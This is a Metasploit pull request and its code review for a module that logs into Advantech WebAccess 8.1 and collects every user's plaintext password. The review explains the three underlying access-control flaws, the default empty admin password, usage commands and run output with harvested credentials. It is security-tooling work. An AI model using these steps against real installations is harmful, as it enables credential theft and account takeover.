### PR TITLE
Add Advantech WebAccess Post Auth Credential Collector

### PR DESCRIPTION
**Pull request by wchen-r7**
## Description

This module allows you to log into Advantech WebAccess, and collect all the username and passwords.

## Verification

- [x] Download version 8.1: http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
- [x] Install, and add some users to WebAccess (default cred: admin:[empty])
- [x] Start msfconsole
- [x] ```use auxiliary/gather/advantech_webaccess_creds```
- [x] ```set WEBACCESSUSER [user]```
- [x] ```set WEBACCESSPASS [pass]```
- [x] ```set RHOST [IP]```
- [x] ```run```
- [x] It should collect creds

## Demo

webaccess_steal_creds

### CODE REVIEW

**Comment by h00die** [comment]
Given credit where credit isn't due, but thanks for the shout-out!
Could add docs tag as well. Assign this to me, I'll look it over shortly

**Comment by wchen-r7** [comment]
@h00die Done! Thanks!

File: documentation/modules/auxiliary/gather/advantech_webaccess_creds.md [hunk 1]
```diff
@@ -0,0 +1,32 @@
+## Description
+
+This module allows you to log into Advantech WebAccess, and gather credentials from the user list.
```
Comment (h00die) [inline documentation/modules/auxiliary/gather/advantech_webaccess_creds.md]: I **really** liked your previous description and how descriptive it was.  Maybe something like:
This module exploits three vulnerabilities in Advantech WebAccess.  The first vulnerability is the ability for an arbitrary user to access the admin user list page, revealing the username of every user on the system.  The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with the data of an arbitrary user.  The final vulnerability exploited is that the HTML Form on the user edit page contains the user's plaintext password in the masked password input box.  Typically the system should replace the actual password with a masked character such as "*".

File: documentation/modules/auxiliary/gather/advantech_webaccess_creds.md [hunk 2]
```diff
@@ -0,0 +1,32 @@
...
+
+**WEBACCESSUSER**
+
+The username to use to log into Advantech WebAccess. By default, there is a built-in account
+```admin``` that you could use.
+
+**WEBACCESSPASS**
+
+The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
+does not have a password, which could be something you can use.
```
Comment (h00die) [inline documentation/modules/auxiliary/gather/advantech_webaccess_creds.md]: can we add an example run plz

File: modules/auxiliary/gather/advantech_webaccess_creds.rb [hunk 3]
```diff
@@ -0,0 +1,173 @@
...
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
+      'Description'    => %q{
+        This module allows you to log into Advantech WebAccess 8.1, and collect all the credentials.
```
Comment (h00die) [inline modules/auxiliary/gather/advantech_webaccess_creds.rb]: all **of** the credentials

File: modules/auxiliary/gather/advantech_webaccess_creds.rb [hunk 4]
```diff
@@ -0,0 +1,173 @@
...
+        Although authentication is required, you do not need to be admin to be able to see other
```
Comment (h00die) [inline modules/auxiliary/gather/advantech_webaccess_creds.rb]: this is kind of wordy, maybe something more like:
Although authentication is required, any level of user permission can exploit this vulnerability.

File: documentation/modules/auxiliary/gather/advantech_webaccess_creds.md (hunk 1 above)
Comment (wchen-r7) [inline documentation/modules/auxiliary/gather/advantech_webaccess_creds.md]: Sure, I'll update it. Thanks!

I also tried to look for CVEs for these problems, and the closest I found was this: https://www.cvedetails.com/cve/CVE-2016-0853/

However, as far as I can tell, that particular CVE is for older versions for WebAccess. Not 8.1. So my guess these problems could earn their own CVEs

File: documentation/modules/auxiliary/gather/advantech_webaccess_creds.md (hunk 2 above)
Comment (wchen-r7) [inline documentation/modules/auxiliary/gather/advantech_webaccess_creds.md]: Sure do.

**Comment by wchen-r7** [comment]
Updated. Thanks!

**Comment by h00die** [comment]
Since `WEBACCESSPASS` is required, it can't be set to blank/empty (unless i dont know how to), which means the default creds admin:'' wont work.

**Comment by h00die** [comment]
issue 2:
```
msf auxiliary(advantech_webaccess_creds) > run

[+] Logged in as sinn3r
[+] Found password: sinn3r:sinn3r
[+] Found password: test123:test123
[+] Found password: test234:test234
[-] Auxiliary failed: NoMethodError undefined method `attributes' for nil:NilClass
[-] Call stack:
[-]   /media/veracrypt1/stcyr/git/metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb:101:in `get_user_cred_detail'
[-]   /media/veracrypt1/stcyr/git/metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb:160:in `block in run'
[-]   /media/veracrypt1/stcyr/git/metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb:159:in `each'
[-]   /media/veracrypt1/stcyr/git/metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb:159:in `run'
[*] Auxiliary module execution completed
msf auxiliary(advantech_webaccess_creds) > 
```

My guess is it hit the admin account which has an empty password so maybe the regex didn't work?

**Comment by wchen-r7** [comment]
> Since WEBACCESSPASS is required, it can't be set to blank/empty (unless i dont know how to), which means the default creds admin:'' wont work.

Fixed. thanks.

**Comment by wchen-r7** [comment]
> My guess is it hit the admin account which has an empty password so maybe the regex didn't work?

Probably. I just fixed this. Please pull again. Sorry about that.

**Comment by h00die** [comment]
New issue:
```
msf auxiliary(advantech_webaccess_creds) > run

[*] Attempting to login as 'sinn3r:sinn3r'
[+] Logged in as sinn3r
[!] No active DB -- Credential data will not be saved!
[*] Checking user page...
[*] Gathering password for user: sinn3r
[+] Found password: sinn3r:sinn3r
[*] Gathering password for user: test123
[+] Found password: test123:test123
[*] Gathering password for user: test234
[+] Found password: test234:test234
[*] Gathering password for user: writes%5Fpretty%5Fcode
[*] Auxiliary module execution completed
```

Its skipping the first user: admin.  

Next, and this isn't your issue, I made the username `writes_pretty_code`, when trying to access the user edit page for them, I get a 500 error.  go figure.  Feel free to ignore that since its not your issue.

**Comment by wchen-r7** [comment]
I have fixed the first issue (skipping admin).

However I'm not sure why the server returns 500 for ```writes_pretty_code```. I tried adding more users after that, and the module extracted those users just fine though.

**Comment by h00die** [comment]
did any of those users have "_" in the name?  I assume that was the issue. Maybe its what i set the password to... however i dont remember what i set it to :)

Looks good to me, i'm ready to merge it unless you have anything left to add
```
msf > use auxiliary/gather/advantech_webaccess_creds
msf auxiliary(advantech_webaccess_creds) > set rhost 192.168.2.164
rhost => 192.168.2.164
msf auxiliary(advantech_webaccess_creds) > run

[+] Logged in as admin
[+] Found password: admin:
[+] Found password: sinn3r:sinn3r
[+] Found password: test123:test123
[+] Found password: test234:test234
[*] Auxiliary module execution completed
msf auxiliary(advantech_webaccess_creds) > set webaccesspass sinn3r
webaccesspass => sinn3r
msf auxiliary(advantech_webaccess_creds) > set webaccessuser sinn3r
webaccessuser => sinn3r
msf auxiliary(advantech_webaccess_creds) > run

[+] Logged in as sinn3r
[+] Found password: admin:
[+] Found password: sinn3r:sinn3r
[+] Found password: test123:test123
[+] Found password: test234:test234
[*] Auxiliary module execution completed
```

**Comment by h00die** [comment]
it gives a 500 in the web browser, i dont think the issue is in your code, but on the web server side

**Comment by wchen-r7** [comment]
It looks like the ```_``` doesn't necessarily cause the 500. I have another user named ```broken_user`` and no 500.

However I did notice that the usernames in the HTML are URI-encoded, which would cause my module to fail to extract the password. I have just fixed the issue, so please pull again and merge if you feel it's ready. Thanks!

**Comment by h00die** [comment]
if you manage like you code, you should hire me.  I'll help keep @wvu-r7 in line.

**Comment by h00die** [comment]
# Release Notes

This module adds a credential gatherer for Advantech WebAccess which works by exploiting 3 vulnerabilities in the system to gather the plaintext password of every user (even admins) of the system.

**Comment by wchen-r7** [comment]
lol thanks! @h00die

**Pull request merged**